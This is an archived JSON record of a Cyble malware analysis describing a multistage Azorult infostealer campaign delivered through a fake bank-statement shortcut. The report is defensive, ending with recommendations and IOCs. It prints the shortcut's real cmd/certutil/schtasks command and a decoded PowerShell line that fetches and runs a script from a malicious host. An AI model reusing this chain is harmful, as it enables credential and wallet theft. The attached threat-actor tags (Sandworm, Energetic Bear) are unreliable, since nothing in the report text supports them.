{ "id": "6ba98164-ce17-4f4e-8bfd-752c9d16bb46", "created_at": "2026-04-06T00:16:01.982932Z", "updated_at": "2026-04-10T03:37:09.024977Z", "deleted_at": null, "sha1_hash": "33f41b06ea005010a9b3e1ba454938911abe39e5", "title": "Sneaky Azorult Back In Action And Goes Undetected - Cyble", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2859996, "plain_text": "Sneaky Azorult Back In Action And Goes Undetected - Cyble\r\nPublished: 2024-01-12 · Archived: 2026-04-05 19:24:59 UTC\r\nKey Takeaways\r\nAzorult malware, identified in 2016, functions as an information-stealing threat.\r\nIt is designed to gather diverse data, including browsing history, cookies, login credentials, and cryptocurrency\r\ndetails.\r\nWe have come across multiple lnk samples that are distributing Azorult, suggesting an ongoing campaign aimed at\r\ntargeting unsuspecting users.\r\nIn the latest campaign, the Azorult begins with a zip file containing a malicious shortcut file posing as a PDF\r\ndocument.\r\nThe shortcut file includes an obfuscated PowerShell script and commands to drop and execute a batch file using the\r\ntask scheduler.\r\nFurther stages involve downloading an additional loader from a remote server, injecting shellcode, and executing the\r\nloader.\r\nThe final step triggers another PowerShell script leading to the execution of the Azorult malware.\r\nThe entire process of downloading and running the loader, as well as the subsequent execution of the final payload,\r\noccurs within the memory to avoid detection.\r\nOverview\r\nFirst identified in 2016, Azorult malware operates as an information-stealing threat, collecting data such as browsing history,\r\ncookies, login credentials, and cryptocurrency details. Additionally, it can function as a downloader for other malware\r\nfamilies. This malicious software was offered for sale on Russian underground forums and was specifically crafted to extract\r\na variety of sensitive information from compromised computers.\r\nWorld's Best AI-Native Threat Intelligence\r\nCyble Research \u0026 Intelligence Labs (CRIL) recently came across several shortcut files posing as PDF files on VirusTotal.\r\nWhile the initial infection vector was not present at the time of identification, phishing emails are common delivery methods\r\nin similar attacks. Our attention was piqued as the final payload turned out to be a loader that loaded Azorult into memory.\r\nSubsequently, we conducted a more in-depth analysis of the malware.\r\nThe Azorult campaign follows a multistage infection chain initiated by a zip file containing a malicious shortcut (lnk) file\r\ndisguised as a PDF document. Within the shortcut file lies an obfuscated PowerShell script, along with commands to drop a\r\nbatch file in the system and execute it through the task scheduler. The PowerShell script then proceeds to download an\r\nadditional loader from a remote server, and injects a hardcoded shellcode which subsequently executes the loader.\r\nUltimately, the loader file triggers another PowerShell script, leading to the execution of the final Azorult malware. Notably,\r\nall stages of the loader and final payload execution occur in memory without leaving any traces in the disk to evade\r\ndetection.\r\nTechnical Details\r\nThe Figure below shows the infection chain of the Azorult.\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 1 of 14\n\nFigure 1 – Azorult Infection Chain\r\nThe figure below shows the citibank_statement_dec_2023.lnk shortcut file.\r\nFigure 2 – Malicious Shortcut File\r\nThe execution process is initiated by the shortcut file, which triggers commands from the %temp% folder location. The\r\ncommand executed by the shortcut file is as follows:\r\n“C:\\Windows\\System32\\cmd.exe” /c echo\r\nc3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgJ2h0dHBzOi8vbnJndGlrLm14L3dwLWNvbnRlbnQvdXBsb2Fkcy93cC1jb250ZW50LnBocCcg\r\n\u003e KgZvPA3S.bat \u0026 certutil -f -decode KgZvPA3S.bat KgZvPA3S.bat \u0026 schtasks /create /f /sc minute /mo 1 /tn n5dMmJEBYc\r\n/tr “C:\\Users\\MALWOR~1\\AppData\\Local\\Temp\\KgZvPA3S.bat”\r\nThe command first creates a batch script file KgZvPA3S.bat into the %temp% location with Base64 encoded string. This\r\nBase64 encoded batch script is then decoded using certutil. The command then creates a schedule task n5dMmJEBYc which\r\nexecutes the newly created batch script KgZvPA3S.bat every minute indefinitely.\r\nThe figure below shows the task schedular entry.\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 2 of 14\n\nFigure 3 – Task Schedular Entry to Execute Batch File\r\nThe decoded batch file KgZvPA3S.bat contains the following command:\r\nstart /min powershell -command “IWR ‘hxxps://nrgtik[.]mx/wp-content/uploads/wp-content.php’ -OutFile\r\n‘%temp%\\fqnIOQdR.js’; schtasks /delete /f /tn n5dMmJEBYc; wscript %temp%\\fqnIOQdR.js”\r\nThis command further executes a PowerShell script which downloads a file hxxps://nrgtik[.]mx/wp-content/uploads/wp-content.php and saves it as JavaScript file fqnIOQdR.js in the temp folder, The powershell script further deletes the\r\npreviously created task schedule entry n5dMmJEBYc and executes newly dropped fqnIOQdR.js file using wscript.\r\nThe figure below shows the contents of the ‘fqnIOQdR.js‘ file.\r\nFigure 4 – Contents of the ‘fqnIOQdR.js’ File\r\nThe malicious script initially verifies the operating system architecture (32-bit or 64-bit) and then checks if the file is named\r\n‘agent.js.’ If the file is not named ‘agent.js,’ the script duplicates itself into the %programdata% directory with the name\r\n‘agent.js.’ Additionally, the script downloads and executes the following two PowerShell scripts:\r\nhxxps://nrgtik[.]mx/wp-content/uploads/agent1.ps1\r\nhxxps://nrgtik[.]mx/wp-content/uploads/agent3.ps1\r\nThe purpose of the PowerShell script, ‘agent1.ps1’, remains ambiguous. However, it is presumed that the script is crafted to\r\ndynamically identify a specific field within a type of assembly. This type of dynamic behaviour is often used by malware to\r\nhide its true intent and make analysis more challenging.\r\nThe figure below shows the PowerShell script agent1.ps1.\r\nFigure 5 – PowerShell Script agent1.ps1\r\nThe second PowerShell script, ‘agent3.ps1’, functions as a loader. It retrieves an executable file from a remote server,\r\nallocates memory, injects shellcode into that allocated memory, and subsequently initiates a new thread to execute the\r\ninjected code. The figure below shows agent3.ps1 PowerShell script.\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 3 of 14\n\nFigure 6 – agent3.ps1 PowerShell Script\r\nThe script initially downloads a loader executable, helper.exe, from a remote server. Subsequently, it employs the GDT\r\n(GetDelegateType) function to dynamically create delegate types and the GPA (GetProcAddr) function to retrieve the\r\naddresses of specific functions from the kernel32.dll module.\r\nUsing the GPA function, the script obtains the addresses of functions such as VirtualAlloc(), CreateThread(), and\r\nWaitForSingleObject() from kernel32.dll. It then utilizes GDT to create delegates for these functions based on the acquired\r\naddresses.\r\nThe script proceeds to allocate memory using VirtualAlloc(), copies shellcode into a global buffer for the downloaded\r\nexecutable, and creates a new thread using CreateThread(), passing the allocated memory with the shellcode and the buffer\r\ncontaining the downloaded executable helper.exe. Finally, it executes the helper.exe thread and waits for the thread to\r\ncomplete execution using WaitForSingleObject(). The script section responsible for loading and executing the shellcode is\r\ndepicted in the figure below.\r\nFigure 7 – Routine for Loading and Executing the Shellcode\r\nThe loader executable “helper.exe” is a VC++ compiled file with an invalid Digital Signature signed by Microsoft. The\r\nbelow image shows the digital certificate details of the loader file.\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 4 of 14\n\nFigure 8 – Invalid Digital Certificate\r\nUpon execution, the helper.exe does an initial check on the language code for the current user using the\r\nGetUserDefaultLangID() API and terminates itself if any of the language code matches the codes given below.\r\nLang code Language and Country\r\n419 Russian\r\n42b Armenian\r\n82c Azerbaijani\r\n42c Azerbaijani (Latin)\r\n423 Belarusian\r\n43f Kazakh\r\n428 Tajik\r\n442 Turkmen\r\n843 Uzbek (Cyrillic)\r\n443 Uzbek (Latin)\r\n422 Ukrainian\r\nThe presence of languages linked to countries in Eastern Europe and Central Asia in the code indicates a potential affiliation\r\nof the Threat Actors (TAs) in this specific geographical region.\r\nAfter conducting the language check, the loader proceeds to verify if it is operating within a virtual environment. This\r\nverification involves collecting information about the display devices through the EnumDisplayDevices() API function and\r\nchecking for matches with predefined strings. If a match is found with any of the hardcoded strings, such as “Hyper-V,”\r\n“VMWare,” “VBoxService.exe,” or “VBoxTray.exe,” the loader terminates its execution. The below image shows the\r\nfunction employed to verify the presence of a virtual environment.\r\nFigure 9 – Anti-VM checks\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 5 of 14\n\nAfter ensuring that the loader is not running in a virtual environment, it proceeds to extract the MachineGuid from the\r\nvictim’s machine, specifically from the SOFTWARE\\Microsoft\\Cryptography registry. The image below shows the malware\r\nquerying the registry to obtain the MachineGuid.\r\nFigure 10 – loader fetches MachineGuid from the registry\r\nThe acquired GUID will be utilized for communicating with command-and-control servers (C\u0026C).\r\nSubsequently, the loader generates a mutex named “F3B7D5F3-30F3-BAC3-F3F3-F3F3F3F3F3F3” to prevent the\r\nexecution of another instance on the same machine. The following image shows the function call with the mutex name used\r\nby the loader.\r\nFigure 11 – Mutex Creation\r\nFollowing the creation of the mutex, the loader proceeds to obtain a handle for the Microsoft Enhanced RSA and AES\r\nCryptographic Provider, facilitating cryptographic operations that involve RSA and AES algorithms as shown in the image\r\nbelow.\r\nFigure 12 – loader gets handled to a cryptographic service provider (CSP)\r\nNext, the loader proceeds to establish a scheduled task named “Firefox Default Browser Agent 458046B0AF4A39CB”\r\nutilizing the COM objects accessed via the previously fetched globally unique identifiers (GUIDs) from the victim’s\r\nmachine.\r\nFigure 13 – loader uses COM Objects\r\nThis task involves the execution of the previously downloaded “agent.js” file located in the C:\\ProgramData\\ folder using\r\n“wscript.exe”. The image below shows the function used to create the scheduled task.\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 6 of 14\n\nFigure 14 – Schedule task to run agent.js file\r\nSubsequently, the loader generates a 20-byte random number through the CryptGenRandom() API. This generated ID,\r\ncombined with the MachineGUID, is utilized in the initial request to the C\u0026C server to retrieve the configuration data. The\r\nimage below shows the HTTP request from the victim’s machine to the C\u0026C server.\r\nFigure 15 – Loader attempts to retrieve configuration data from C\u0026C\r\nBased on the configuration response received from the C\u0026C, the loader may proceed with other malicious activities from\r\nthe victim’s computer.\r\nFollowing this, the loader generates another URL string to execute a next stage PowerShell Payload “sd2.ps1” from an\r\nadditional remote server “hxxps://nrgtik[.]mx/wp-content/uploads”. This entire process is carried out without leaving any\r\nfile on disk. The image below shows the initialization of the ShellExecute() function to retrieve and execute the PowerShell\r\nscript from the remote server.\r\nFigure 16 – Loader executes a PowerShell Script from the remote server\r\nPowerShell Script sd2.ps1\r\nThis new PS script downloads configuration data from a specified URL “hxxp://45[.]90.58.1/index.php”, where $guid is\r\nused as parameters in the URL. The downloaded data is then split into an array using the pipe character (‘|’) as the delimiter.\r\nThe below image shows the response from the server.\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 7 of 14\n\nFigure 17 – C\u0026C response\r\nWith the obtained key, the script performs an XOR (exclusive OR) operation on each byte within the encoded content found\r\nin the PowerShell script “sd2.ps1”. The below image shows the partial content of the encoded content.\r\nFigure 18 – Partial content of the byte array\r\nAfter completing the decoding process, the outcome represents the final payload, which is the Azorult infostealer. The script\r\nproceeds to load the decoded assembly into the PowerShell memory using [System.Reflection.Assembly]::Load().\r\nAzorult Payload\r\nThe ultimate payload is a 32-bit Azorult .Net executable with the capability to execute various malicious activities within the\r\nsystem. Initially, the malicious binary utilizes Curve25519 elliptic curve cryptography to perform the following actions:\r\ngenerate a random private key, clamp it for security purposes, derive the corresponding public key, and compute a shared\r\nsecret by utilizing a peer’s public key. This shared secret can subsequently be employed for symmetric key encryption or\r\nother secure communication purposes. The figure below shows the code for key generation.\r\nFigure 19 – Routine for Initiating Encryption\r\nAfter that, Azorult performs several checks through a function named checkVal(), which returns a Boolean value. If any of\r\nthe checks returns TRUE, the binary terminates execution. The following are the checks conducted by the binary:\r\n1. It verifies the presence of a mutex, and if found, it returns true.\r\n2. It examines whether TwoLetterISOLanguageName is not null and belongs to one of the country codes: AZ, AM, BY,\r\nKZ, KG, MD, RU, TJ, TM, UZ, and UA. If the code is null or matches one of the mentioned country codes, it returns\r\ntrue.\r\n3. It checks for the existence of a file named “пароли.txt” (password.txt) on the Desktop. If the file is present, it returns\r\ntrue.\r\n4. The binary queries video controllers in the system using “select Name from Win32_VideoController.” If the Name is\r\n“Wine Adapter,” it returns true.\r\n5. Finally, the binary checks the machine name and usernames on the victim’s system. It returns true if the machine\r\nname is not equal to “WILLCARTER-PC” and “FORTI-PC” and if the username matches one of “Joe Cage,”\r\n“STRAZNJICA.GRUBUTT,” “Paul Jones,” or “PJones.”\r\nThe figure below shows a code snippet for various checks.\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 8 of 14\n\nFigure 20 – AZROULT Performing Various System Checks\r\nFollowing the execution of various checks, Azorult proceeds to create a unique string for identifying the victim using the\r\nputBaseCfg() method. This method takes the buildId parameter, and the resulting string follows the format: “BASECFG |” +\r\n\u003cMachineGuid\u003e + ” buildId”. The buildId is supplied as a parameter during execution, while the MachineGuid is retrieved\r\nfrom the registry entry “SOFTWARE\\Microsoft\\Cryptography.” The routine responsible for generating this unique identifier\r\nstring is illustrated in the figure below.\r\nFigure 21 – Azorult Creating Config String\r\nAfter generating the string using the putBaseCfg() method, malware proceeds to gather system information through the\r\nsysteminfo() method, which also requires the buildId as a parameter. This function extracts various system details and\r\ncompiles them into a string. The collected information is then stored in a text file named “System.text.” The following data\r\nis extracted from the system:\r\nUUID\r\nMachine Name\r\nUsername\r\nActive Directory Domain name\r\nCPU architecture\r\nGPU\r\nRAM\r\nScreen Resolution\r\nSystem Language\r\nSystem Time zone\r\nOperating system\r\nAnti-Virus Product\r\nInstalled programs\r\nThe figure below shows the code snippet of systeminfo() method.\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 9 of 14\n\nFigure 22 – System Information Extracted by Azorult\r\nAfter retrieving system information, Azorult focuses on crypto wallets. The executable includes a method called\r\ncryptowallets(), which takes the %appdata% location as a parameter. This method searches for important and sensitive\r\nwallet-related files in the system and collects all the data into a directory. The table below lists the wallets targeted by the\r\nbinary:\r\nEthereum Electrum Electrum-LTC ElectronCash Monero\r\nJaxx Guarda MyMonero Wasabi atomic\r\nBlockstreamGreen BitPay Exodus Daedalus Ledger Live\r\nTrezor  \r\nThe figure below shows the routine to extract the crypto wallet-related files.\r\nFigure 23 – Wallets Targeted by Azorult\r\nAfter targeting wallets, the malware then focuses on various browsers, attempting to extract important files from different\r\ndata locations. The malware specifically targets Mozilla Firefox, Google Chrome, Microsoft Edge, Brave, and Opera. The\r\nfigure below shows the routine to target the browser.\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 10 of 14\n\nFigure 24 – Browsers Targeted by Azorult\r\nAzorult targets multiple applications including Authy, WinAuthy, Discord, FileZilla, OpenVPN, WinSCP, Steam, and\r\nTelegram. The figure below shows a code snippet of the malware.\r\nFigure 25 – Azorult Targeting Various Application Programs\r\nAdditionally, Azorult captures screenshot of the system. The figure below shows the routine to capture screenshot.\r\nFigure 26 – Azorult Routine for Capturing Screenshot\r\nAfter collecting all the artifacts, Azorult sends the data to the remote server. The server URL is passed by the loader as a\r\nparameter to the Azorult binary. The data is compressed and encrypted before sending it to the server. The figure below\r\nshows the routine to encrypt the data and send it to the server.\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 11 of 14\n\nFigure 27 – Routine to Send Encrypted Data to Server\r\nConclusion\r\nAzorult is an insidious information-stealing malware, adept at extracting sensitive data and acting as a downloader for\r\nadditional threats. The new infection chain is part of a complex multistage Azorult campaign, that employs obfuscated\r\nPowerShell scripts and memory-based execution to conceal its activities. The loader and payload files are never stored in the\r\ndisk which makes it highly unlikely to get detected by security solutions. The campaign’s sophistication, coupled with its\r\navailability on underground forums, underscores the ongoing threat it poses to compromised systems.\r\nOur Recommendations \r\nThe initial infiltration for the AZORULT RAT loader typically takes place via phishing websites or emails. It is\r\ncrucial to only download and install software applications from well-known and trusted sources and avoid opening\r\nemails from unknown senders.\r\nUsers should confirm the legitimacy of websites by verifying the presence of a secure connection (https://) and\r\nensuring the accurate spelling of domain names.\r\nDeploy strong antivirus and anti-malware solutions to detect and remove malicious executable files.\r\nEnhance the system security by creating strong, distinct passwords for each of the accounts and, whenever feasible,\r\nactivate two-factor authentication.\r\nRegularly back up data to guarantee the ability to recover it in case of an infection and keep users informed about the\r\nmost current phishing and social engineering methods employed by cybercriminals.\r\nMITRE ATT\u0026CK® Techniques \r\nTactic  Technique ID  Technique Name \r\nExecution  (TA0002) User Execution (T1203)\r\nUser opens the malicious\r\nShortcut file\r\nExecution  (TA0002)\r\nCommand and Scripting Interpreter:\r\nWindows Command Shell (T1059.003)\r\nAzroult can execute itself using\r\ncmd.exe\r\nCredential Access\r\n(TA0006)\r\nCredentials from Password Stores:\r\nCredentials from web Browsers\r\n (T1555.003)\r\nThe user opens the malicious\r\nShortcut file\r\nCredential Access\r\n(TA0006)\r\nInput Capture: GUI Input Capture\r\n(T1056.002)\r\nAzroult can take screenshots\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 12 of 14\n\nDiscovery (TA0007) File and Directory Discovery (T1083)\r\nAzroult can discover Application\r\nfiles and directories\r\nCommand and\r\nControl (TA0011)\r\nNon-Application Layer Protocol (T1095)\r\nAzroult uses TCP for C\u0026C\r\ncommunication\r\nExfiltration\r\n(TA0010)\r\nExfiltration Over CC\u0026C Channel (T1041) Exfiltration Over C\u0026C Channel\r\nIndicators of Compromise (IOCs) \r\nIndicators \r\nIndicator\r\nType \r\nDetails \r\na647fd01215b0a86246007f36b7832f6\r\nb2bc65b0c792fc4ef32fc7c1d399f9f47ef15bd1\r\n778b230b696e5ddb3a1063c939a60449f24d6f5bac91ac76e2c1e4dc24a20836\r\nMD5\r\nSHA1\r\nSHA256\r\ncitibank_statement_dec_2023.zip\r\n84d45c0ce97155ca8eb16980dca11215\r\n897309fbe2028ebb2ac40cdf83fefc72dafe8632\r\n37a76a6009092eebcfe08efe479cdde6f8d0cf6fd9ea2ce023e0c6a43d56693a\r\nMD5\r\nSHA1\r\nSHA256\r\ncitibank_statement_Dec_2023.lnk\r\n9e3d15ed4044692d6f759f188f347355\r\n126c54696ecf7d36131a54006b3a2e524073189f\r\nfc1ff043b6ab1e1a22baa93abbfa2fefcbb796f4de67224f589dc6dcd45c02f1\r\nMD5\r\nSHA1\r\nSHA256\r\nfqnIOQdR.js\r\nc798c2fa8da58fc07210969ea5136977\r\ne11ff82d2e3db02ab4a450dcafbb38fd184c977f\r\nfd2b8640d3d05d80e769529883196fee8cc2c68d80416b7ee7b037cde5c3a877\r\nMD5\r\nSHA1\r\nSHA256\r\nKgZvPA3S.bat\r\ndff2440766c462e3a2bb2b198085d171\r\n7b6c7b2c1ead869a658c3230356beec3c95062bd\r\nce7bd981cb416e2df589541ddbc0a3e6f3be5201a33f77e065cc79484b096a33\r\nMD5\r\nSHA1\r\nSHA256\r\nagent.js\r\nf05df7c16d8c236fab6ee2b2a1997ce5\r\nc907067a207eb47eca8bdca81c18caddee133ff5\r\nace2a7812874a84b32590f440f9c4d9d99567e12cb86f0ba598e5e65aa4948c0\r\nMD5\r\nSHA1\r\nSHA256\r\nagent1.ps1\r\n274945641a4f798a13bddec960a82670\r\nd61ef316cc5b8ec477fcfd8a2a677f53b79c6e0f\r\n30ab6f1db490a46fb8f1643ca97194988676498baf1ae4e124352f6cc1108568\r\nMD5\r\nSHA1\r\nSHA256\r\nagent3.ps1\r\nbc0523db21c69a68ba3e7bfc4711f969\r\n8308433cb92810bcd6f220e7b6083c778e00fe12\r\nfd64e712eac0c7d5fdec9a1f47c1f384a67a181c13e3e98ff40ee122e9ff8347\r\nMD5\r\nSHA1\r\nSHA256\r\nhelper.exe\r\nb4127347d3d08d1a466289b2071e81e7\r\n49c7bf64cf331e5269a5fce351188b9ce6167571\r\n464a917b631b2a583025bdce274ba6f314fe30822cfa400301b924daf38e8a8c\r\nMD5\r\nSHA1\r\nSHA256\r\nsd2.ps1\r\n16eedcc3da8cc730941c9a2f4adaaf7a\r\nc62df841320132fc0196101305ad6337c4d0e31e\r\n518d8bc5fa3f5ef09792aca8c78bed5c762e8a4e6a45f44cae974264cb5d0652\r\nMD5\r\nSHA1\r\nSHA256\r\nsd4.ps1\r\nhxxps://nrgtik[.]mx/wp-content/uploads/wp-content.php URL Malicious URL\r\nhxxps://nrgtik[.]mx/wp-content/uploads/agent1.ps1 URL Malicious URL\r\nhxxps://nrgtik[.]mx/wp-content/uploads/agent3.ps1 URL Malicious URL\r\nhxxps://nrgtik[.]mx/wp-content/uploads/helper.exe URL Malicious URL\r\nhxxps://nrgtik[.]mx/wp-content/uploads/sd2.ps1 URL Malicious URL\r\nhxxps://nrgtik[.]mx/wp-content/uploads/sd4.ps1 URL Malicious URL\r\nnrgtik[.]mx Domain Malicious Domain\r\nhxxp://45.90.58[.]1/index.php?id=$guid\u0026subid=c4gQX595 url C\u0026C\r\n45.90.58[.]1 IP C\u0026C\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 13 of 14\n\n27ca5b7ab4fa5053761347cda6c5c923\r\nbba6ec0bf8fc454daa61c577d1813394dd6b6d1f\r\n7ca5e9e3033f7913657dce0b85520ec3384ae6653235af093ac2a6e442791225\r\nMD5\r\nSHA1\r\nSHA256\r\ncitibank_statement_Dec_2023.lnk\r\n1d2d48cdf0805192afa82c98252ab5d3\r\n119c6b9667e0c0c5204fc587b36f195d62c4c788\r\ne6354942792174245b72ccfc53c1af0082ff09b239dcb138bcb79c2d9e2665c5\r\nMD5\r\nSHA1\r\nSHA256\r\ncitibank_statement_Dec_2023.lnk\r\n72ea03e510a67b4fc05aea2820c88280\r\n52e34e60664da8634cafc1f6bae8f33332772f3e\r\n5c324e6671cefb63bd1b2c64adf2cef42daec7cb5179e18966b7719508ed314b\r\nMD5\r\nSHA1\r\nSHA256\r\ncitibank_statement_Dec_2023.lnk\r\n735ad0b79ceaa614e465e62d8f3d4455\r\n0d31b18630252c1ce69c7d52453e77ba72f1f668\r\ne0e8ff864814e3a9f21f13c49ae139ba4bc89f0d519fed3d3b7ee3c5053cde30\r\nMD5\r\nSHA1\r\nSHA256\r\ncitibank_statement_Dec_2023.lnk\r\n6c5d40687a6b5cacf90f43799c62e7b8\r\nb393759a1a54dcd2aa1f60249e129a4f5f8c84ef\r\n1a8cfda57d60852c1604ca179f1483edbc652f9486072878e4dab4b413dda321\r\nMD5\r\nSHA1\r\nSHA256\r\ncitibank_statement_Dec_2023.lnk\r\nac64471cc8eb90b31f91a81398502e87\r\n14aff6d9b16fa39799041c9f0741e5a2a1194888\r\n465c34bdaee28c628b9639ca77c6a190c5fc400ba735a498d0689f1da747a341\r\nMD5\r\nSHA1\r\nSHA256\r\ncitibank_statement_Dec_2023.lnk\r\n93f91815cf0bfee78b13f4a79d683151\r\n567c7e0144223a84a72a60a7f20996decc2feb76\r\nb4ccb27acf65da46693be6987b890f2f19481ec1824f2c3017493245fe9ed4aa\r\nMD5\r\nSHA1\r\nSHA256\r\ncitibank_statement_Dec_2023.lnk\r\n67a69b58f31f30eafdbba927c07d4b76\r\ne7f1d6c4239a90ef1ea6cee83a7174c2657318db\r\n386661e445f65f30b0a68f264f1393a722ba90d3f3491ae57af7745e18cb13c8\r\nMD5\r\nSHA1\r\nSHA256\r\ncitibank_statement_Dec_2023.lnk\r\nReferences\r\nhttps://blogs.blackberry.com/en/2019/06/threat-spotlight-analyzing-azorult-infostealer-malware\r\nSource: https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/" ], "report_names": [ "sneaky-azorult-back-in-action-and-goes-undetected" ], "threat_actors": [ { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434561, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/33f41b06ea005010a9b3e1ba454938911abe39e5.pdf", "text": "https://archive.orkl.eu/33f41b06ea005010a9b3e1ba454938911abe39e5.txt", "img": "https://archive.orkl.eu/33f41b06ea005010a9b3e1ba454938911abe39e5.jpg" } }